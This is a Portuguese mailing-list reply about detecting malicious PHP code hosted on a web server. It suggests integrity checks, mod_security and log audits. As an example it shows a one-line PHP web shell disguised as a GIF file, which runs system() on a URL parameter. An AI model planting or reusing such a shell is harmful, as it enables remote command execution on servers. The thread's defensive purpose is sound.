Olá,

até onde eu entendi, o interesse da Cristina é em não ser uma provedora de
códigos maliciosos, no caso PHP.

Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques
a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na
realidade não conheço solução voltada para isso... existe o mod_security do
apache que pode te ajudar a monitorar e filtrar suas aplicações.

Penso em algum programa que cheque a integridade de arquivos no servidor,
algo parecido com o file:

[EMAIL PROTECTED]:~$ cat sh.gif
<?php
        system($_GET['sh']);
?>
[EMAIL PROTECTED]:~$ file sh.gif
sh.gif: PHP script text

e depois, habilitar alguns filtros no mod_security buscando checar qualquer
uso indevido do php... confesso que não conheço muito o mod_security, uma
vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar
um tempo para brincar com ele).

Acredito que no mais é realizar auditorias... procurar nos logs do apache
por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não
resolva!

Espero ter ajudado, boa sorte!

Em 22/02/08, William Grzybowski <[EMAIL PROTECTED]> escreveu:

> Oi Patrick,
>
> Não sei se entendi muito bem, poderia me dar uma luz?
> Php injection, como próprio nome ja diz é a inserção de codigo php
> causado por código mal escrito que permito o injeção de código php
> externo no servidor, correto?
>
> Como que funcionam essas regras que você falou? Essas empresas liberam
> regras que atuam (obviamente) na ""camada"" do HTTP e analizam o
> trafego para os softwares vulneraveis que eles tem conhecimento e
> inclusao direta de scripts em servidores externos?
>
> Vlw

> [...]

Att, Marcelo M. Fleury
Linux User: #369521
Blog - http://marcelomf.blogspot.com/

"Não basta saber, é preciso também aplicar; não basta querer é preciso
também agir" By Goethe